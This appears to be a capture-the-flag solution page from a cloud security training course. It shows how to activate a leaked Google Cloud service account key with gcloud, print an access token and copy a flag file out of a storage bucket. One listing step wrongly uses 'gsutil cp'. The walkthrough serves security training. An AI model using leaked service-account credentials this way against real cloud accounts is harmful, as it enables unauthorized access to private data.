At Your Service - Solution

Introduction

There were once two hard working and fun loving men called Pranav and Bhagavan. As part of their everyday work, they would exchange challenges and artifacts in the cloud with each other using restricted service accounts.

We were able to intercept one of these exchanges but were only able to get hold of the service account json key. We did over hear them talking about a storage bucket called ctf-bucket-appsecco which supposedly contains the goodies that they don't want the rest of the world to see.

Can you help us find and read the contents of this bucket, please?

Starting point

  1. Download and use the service account json - https://storage.googleapis.com/access-nullcon-training/sa-token.json

  2. Find the storage object and the secret file that Pranav and Bhagavan want to hide from us

Your task

  1. Read the contents of the ctf-bucket-appsecco

Walkthrough

  1. Download the service account json from the given URL under starting point.

  2. Use gcloud to activate the service account that this key belongs to gcloud auth activate-service-account --key-file=sa-token.json

  3. Verify the service account is activated - gcloud auth list

  4. Generate a auth token for this service account and assign to a variable - export gcp_token=$(gcloud auth print-access-token)

  5. List the contents of the ctf-bucket-appsecco using gsutil - gsutil cp gs://ctf-bucket-appsecco/

  6. Download and read the contents of the flag.txt - gsutil cp gs://ctf-bucket-appsecco/flag.txt .;cat flag.txt

PreviousA Bucket Load of TroubleNextRunning in the Clouds - Solution

Last updated